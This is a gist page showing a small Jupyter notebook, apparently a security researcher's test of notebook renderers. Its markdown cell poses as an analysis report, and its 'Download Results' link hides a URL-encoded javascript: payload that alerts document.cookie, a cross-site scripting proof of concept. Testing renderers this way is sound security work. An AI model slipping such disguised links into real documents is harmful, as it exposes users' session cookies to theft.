Last active 21 hours ago

secresearcher01 revised this gist 21 hours ago. Go to revision

1 file changed, 45 insertions

encoded_test.ipynb(file created)

@@ -0,0 +1,45 @@
1 + {
2 + "cells": [
3 + {
4 + "cell_type": "markdown",
5 + "metadata": {},
6 + "source": [
7 + "# Analysis Report\n",
8 + "\n",
9 + "Results are ready for review.\n",
10 + "\n",
11 + "[Download Results](javascript:alert%28document.cookie%29)\n"
12 + ]
13 + },
14 + {
15 + "cell_type": "code",
16 + "execution_count": 1,
17 + "metadata": {},
18 + "outputs": [
19 + {
20 + "output_type": "stream",
21 + "name": "stdout",
22 + "text": [
23 + "Processing complete\n"
24 + ]
25 + }
26 + ],
27 + "source": [
28 + "print('Processing complete')"
29 + ]
30 + }
31 + ],
32 + "metadata": {
33 + "kernelspec": {
34 + "display_name": "Python 3",
35 + "language": "python",
36 + "name": "python3"
37 + },
38 + "language_info": {
39 + "name": "python",
40 + "version": "3.9.0"
41 + }
42 + },
43 + "nbformat": 4,
44 + "nbformat_minor": 4
45 + }
Newer Older